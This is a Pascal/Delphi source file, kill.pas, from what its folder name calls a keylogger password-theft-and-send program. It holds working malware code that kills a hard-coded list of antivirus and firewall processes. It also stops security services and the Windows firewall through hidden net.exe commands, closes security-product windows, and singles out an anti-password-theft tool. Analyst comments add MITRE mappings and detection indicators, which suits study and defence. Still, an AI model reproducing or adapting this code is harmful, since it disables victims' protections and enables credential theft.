
📄 kill.pas

📁 键盘全记录密码盗取发送程序源代码
unit Kill;

interface

uses
   Windows,ShellAPI,TLHelp32;

Function  KillProcess(TheProcName:String):boolean; 
procedure Killer;

implementation

// Local stand-in for SysUtils.AnsiCompareText: compares S1 and S2 without
// regard to case, using the user's default locale.
// CompareString reports 1 / 2 / 3 for less / equal / greater (0 on failure),
// so subtracting 2 gives the usual negative / zero / positive result.
function AnsiCompareText(const S1, S2: string): Integer;
var
  Outcome: Integer;
begin
  Outcome := CompareString(LOCALE_USER_DEFAULT, NORM_IGNORECASE,
    PChar(S1), Length(S1), PChar(S2), Length(S2));
  Result := Outcome - 2;
end;
// Local stand-in for SysUtils.UpperCase: returns a copy of AStr in which
// every character has been passed through System.UpCase. Characters that
// UpCase does not map are copied unchanged.
function UpperCase(AStr:string):string; overload;
var
 Idx:Integer;
begin
 Result:=AStr;
 Idx:=1;
 while Idx<=Length(Result) do
 begin
  Result[Idx]:=System.UpCase(Result[Idx]);
  Inc(Idx);
 end;
end;
// Local stand-in for SysUtils.ExtractFilePath: returns everything up to and
// including the last backslash in APath, or '' when APath is empty or holds
// no backslash. Only '\' is treated as a separator.
function ExtractFilePath(APath:string):string;
var
 Idx:Integer;
begin
 Result:='';
 Idx:=Length(APath);
 // Scan backwards so the first hit is the last separator in the path.
 while Idx>=1 do
 begin
  if APath[Idx]='\' then
  begin
   Result:=Copy(APath,1,Idx);
   Exit;
  end;
  Dec(Idx);
 end;
end;
// Local stand-in for SysUtils.ExtractFileName: returns the part of APath
// after its last backslash, the whole string when there is no backslash,
// and '' for an empty path. Only '\' is treated as a separator.
function ExtractFileName(APath:string):string;
var
 Idx,Start:Integer;
begin
 Result:='';
 if Length(APath)=0 then Exit;
 // Start stays at 1 when no separator is found, i.e. the whole string is kept.
 Start:=1;
 for Idx:=Length(APath) downto 1 do
  if APath[Idx]='\' then
  begin
   Start:=Idx+1;
   Break;
  end;
 Result:=Copy(APath,Start,MaxInt);
end;
// Opens the registry key StrPath under Root with KEY_ALL_ACCESS and returns
// its handle. The status code of RegOpenKeyEx is discarded; the handle is
// pre-set to 0, which is what the caller receives if the API leaves it
// untouched on failure.
function OpenKey(Root:HKEY;StrPath:pchar):Hkey;
begin
	Result:=0;
	RegOpenKeyEx(Root,StrPath,0,KEY_ALL_ACCESS,Result);
end;
// Reads the registry value StrValue from key StrPath under Root and returns
// it as a string; returns '' when the query does not succeed.
// The value is read into a fixed 256-character buffer, so a value that does
// not fit makes RegQueryValueEx fail and yields ''. The value type reported
// back by the API is not inspected.
function ReadValue(Root:HKEY;StrPath:pchar;StrValue:pchar):String;
var
	KeyHandle:Hkey;
	Kind,ByteCount:DWORD;
	Buffer:array[0..255] of char;
begin
	Result:='';
	Kind:=REG_SZ;
	KeyHandle:=OpenKey(Root,StrPath);
	ByteCount:=SizeOf(Buffer);
	if RegQueryValueEx(KeyHandle,StrValue,nil,@Kind,@Buffer[0],@ByteCount)=0 then
		Result:=Buffer;
	// The key handle is released on both the success and the failure path.
	RegCloseKey(KeyHandle);
end;
//-------------------------------------------------------------------------




// Terminates the first running process whose image name equals TheProcName.
// The match is a plain string comparison against szExeFile from a Toolhelp
// process snapshot, so it is case-sensitive as written.
// Returns the result of TerminateProcess for the matching process; Result is
// only assigned on the match path.
// Declared in the interface section; nothing inside this unit calls it
// (Killer goes through Killpro instead).
// Analyst note: the observable behaviour is a process snapshot followed by
// OpenProcess(PROCESS_ALL_ACCESS) and TerminateProcess on another process.
Function KillProcess(TheProcName:String):boolean;
var  
    isOK:Boolean;
    ProcessHandle:Thandle;
    ProcessStruct:TProcessEntry32;
    // Opens the process with full access rights and terminates it with
    // exit code 0. The handle H is not closed in this helper.
    Function KillProcessID(ProcessID:Cardinal):boolean;
      var
      H:THandle;
      begin
      H:=OpenProcess(Process_All_Access, true,ProcessID);
      Result:=TerminateProcess(H,0);
      end;
begin
   // Snapshot of all processes; dwSize is set before the first enumeration call.
   ProcessHandle:=createtoolhelp32snapshot(Th32cs_snapprocess,0);
     processStruct.dwSize:=sizeof(ProcessStruct);
     isOK:=process32first(ProcessHandle,ProcessStruct);
     while isOK do
     begin
  	 if TheProcName=ProcessStruct.szExeFile then
         begin
            // First match wins: terminate, release the snapshot, stop scanning.
            Result:=KillProcessID(ProcessStruct.th32ProcessID);  
            CloseHandle(ProcessHandle);
            exit;    
         end;       
	 isOK:=process32next(ProcessHandle,ProcessStruct);
     end;       
     CloseHandle(ProcessHandle);
end;


// Walks a Toolhelp snapshot and calls TerminateProcess on every entry whose
// image name matches s. Unlike KillProcess it does not stop at the first
// match and reports nothing back to the caller.
// The name from the snapshot is upper-cased (both the full szExeFile and its
// file-name part) before the comparison; s is used exactly as passed.
// Analyst note: each match produces an OpenProcess(PROCESS_ALL_ACCESS) /
// TerminateProcess pair against the target, which is the event to look for
// in process-access telemetry when the target is a security product.
procedure Killpro(s: string);
var
  lppe: tprocessentry32;
  sshandle: thandle;
  hh: hwnd;
  found: boolean;
begin
  sshandle := createtoolhelp32snapshot(TH32CS_SNAPALL, 0);
  found := process32first(sshandle, lppe);
  while found do
  begin
    if (uppercase(extractfilename(lppe.szExeFile)) = s) or
      (uppercase(lppe.szExeFile) = s) then
    begin
      // hh is declared as hwnd but holds a process handle here.
      hh := OpenProcess(PROCESS_ALL_ACCESS, true, lppe.th32ProcessID);
      TerminateProcess(hh, 0);
    end;
    found := process32next(sshandle, lppe);
  end;
  CloseHandle(sshandle);
end;

// Targets one specific anti-password-theft product (the Uninstall key name
// translates roughly to "Password Anti-Theft Expert, Comprehensive Edition").
// Steps, as visible in the code:
//   1. Read the product's UninstallString from HKLM\...\Uninstall\<product>;
//      return immediately if it is missing.
//   2. Cut the string at the first space and keep only the directory part,
//      which is taken to be the install directory.
//   3. Enumerate *.exe in that directory. For files whose name starts with a
//      digit, or is PasswordGuard.exe, try to open the file for writing with
//      no sharing. If that open fails, hand the upper-cased file name to
//      Killpro; otherwise just close the handle.
// NOTE(review): the failed exclusive open is presumably used as an
// "executable is currently running" test - confirm against the target.
// Analyst note: a registry read of another product's Uninstall key followed
// by exclusive-open probes of its executables and process termination is the
// behavioural footprint of this routine.
procedure KillZhuanJia;
var
  found: boolean;
  s,path:string;
  i:integer;
  h,FindHandle: THandle;
  FindData: TWin32FindData;
begin
  path:=ReadValue(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\密码防盗专家 综合版','UninstallString');
  if path='' then exit;
  // Drop everything from the first space on (e.g. uninstaller arguments).
  i:=pos(' ',path);
  if i<>0 then delete(path,i,MaxInt);
  path:=extractfilepath(Path);
  FindHandle := FindFirstFile(PChar(path + '*.exe'), FindData);
  s:='';
  Found := FindHandle <> INVALID_HANDLE_VALUE;
  while Found do begin // original comment read "if an stg file is found"; the search pattern here is *.exe
{    if (Ansicomparetext(FindData.cFileName,'PasswordGuard.exe')=0)or
    (Ansicomparetext(FindData.cFileName,'UNWISE.EXE')=0)or
    (Ansicomparetext(FindData.cFileName,'autoupdate.exe')=0)or
    (Ansicomparetext(FindData.cFileName,'magic.exe')=0)then }
    // Active filter: file name begins with a digit, or is PasswordGuard.exe
    // (case-insensitive). The block above is an older, disabled name list.
    if ((FindData.cFileName[0]>='0')and(FindData.cFileName[0]<='9'))or
       (Ansicomparetext(FindData.cFileName,'PasswordGuard.exe')=0) then
    begin
      // Share mode 0 requests exclusive access to the existing file.
      h:=Integer(CreateFile(PChar(path+FindData.cFileName), GENERIC_WRITE,
        0, nil, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0));
      if h= INVALID_HANDLE_VALUE then
      begin
        s:=uppercase(FindData.cFileName);
        //Messagebox(0,pchar(s),'',0);
        KillPro(s);
        // Second attempt with a 15-character form of the name.
        // NOTE(review): presumably covers systems that report a truncated
        // image name in the snapshot - not established by this file.
        if (Ansicomparetext(FindData.cFileName,'PasswordGuard.exe')=0) then
          KillPro(uppercase('PasswordGuard.e'));
      end
      else CloseHandle(h);
    end;
    Found := FindNextFile(FindHandle, FindData);
  end;
  Windows.FindClose(FindHandle);
end;


// Entry point of this unit (exported in the interface section). It tries to
// shut down security software on the host in four ways:
//   1. KillZhuanJia - product-specific routine for one anti-password-theft tool.
//   2. Killpro on a hard-coded list of image names (the names look like
//      antivirus / personal-firewall processes).
//   3. Two hidden "net.exe stop ..." invocations via ShellExecute (SW_HIDE).
//   4. Window messages $0012 (WM_QUIT) and $0010 (WM_CLOSE) sent to windows
//      located by class name and/or title.
// Analyst note: this is defence-evasion behaviour (MITRE ATT&CK T1562.001,
// Impair Defenses: Disable or Modify Tools). Useful detection points are one
// process opening many security-product processes with PROCESS_ALL_ACCESS,
// a hidden net.exe child with "stop" arguments, and WM_CLOSE / WM_QUIT being
// posted across process boundaries to security-product windows. The literal
// names and window titles below can serve as static indicators for this
// sample family.
procedure Killer;
var
  s, Desktop: integer;
  str: array[0..100] of char;
begin
  KillZhuanJia;
  // Hard-coded image names passed to Killpro one by one.
  Killpro('EGHOST.EXE');
  Killpro('KVMonXP.EXE');
  Killpro('Kvsrvxp.EXE');
  Killpro('KVSrvXp_1.EXE');
  Killpro('KpopMon.EXE');
  Killpro('KavPFW.EXE');
  Killpro('kavstart.EXE');
  Killpro('Rtvscan.EXE');
  Killpro('Nvsvc32.EXE');
  Killpro('VPTray.EXE');
  Killpro('RAVMON.EXE');
  Killpro('RAVMOND.EXE');
  Killpro('RAVTIMER.EXE');
  Killpro('RavService.EXE');
  Killpro('CCENTER.EXE');
  Killpro('Kav.EXE');
  Killpro('kav32.EXE');
  Killpro('RfwMain.EXE');
  Killpro('RRfwMain.EXE');
  Killpro('PFW.exe');
  // Service stops run through net.exe with the window hidden; the results of
  // ShellExecute are not checked. "sharedaccess" is the Windows firewall /
  // connection-sharing service name on Windows XP-era systems.
  ShellExecute(0, 'open', 'net.exe',' stop KVSrvXP.EXE', nil, SW_HIDE);
  ShellExecute(0, 'open', 'net.exe',' stop sharedaccess', nil,SW_HIDE);

  // Title translates roughly to "Jiangmin Antivirus KV2004: real-time monitor".
  // $0012 = WM_QUIT, posted only when the window was found.
  s:=FindWindow(nil,'江民杀毒软件 KV2004:实时监视');
  if s<>0 then PostMessage(s,$0012,0,0);
  // From here on $0010 = WM_CLOSE is sent without checking the FindWindow result.
  s := findwindow(pchar('RavMonClass'), pchar('RavMon.exe'));
  Sendmessage(s, $0010, 0, 0);
  // Titles translate roughly to "SkyNet Firewall Personal Edition" and
  // "... Enterprise Edition".
  s := findwindow('Tapplication', '天网防火墙个人版');
  Sendmessage(s, $0010, 0, 0);
  s := findwindow('Tapplication', '天网防火墙企业版');
  Sendmessage(s, $0010, 0, 0);
  // Walk all top-level windows of class TForm1 and close those whose title
  // starts with the given text (roughly "Trojan Buster").
  s := 0;
  Desktop := GetDesktopWindow;
  repeat
    s := findwindowex(Desktop, s, 'TForm1', nil);
    getwindowtext(s, str, 9);
    if str = '木马克星' then
      sendmessage(s, $0010, 0, 0);
  until s = 0;
  // Same walk for a second title (roughly "Bacteriophage").
  s := 0;
  Desktop := GetDesktopWindow;
  repeat
    s := findwindowex(Desktop, s, 'TForm1', nil);
    getwindowtext(s, str, 7);
    if str = '噬菌体' then
      sendmessage(s, $0010, 0, 0);
  until s = 0;
  // Two further windows addressed by class name (and title for ZoneAlarm).
  s := findwindow(pchar('TfLockDownMain'), nil);
  Sendmessage(s, $0010, 0, 0);
  s := findwindow(pchar('ZAFrameWnd'), pchar('ZoneAlarm'));
  Sendmessage(s, $0010, 0, 0);
end;



end.
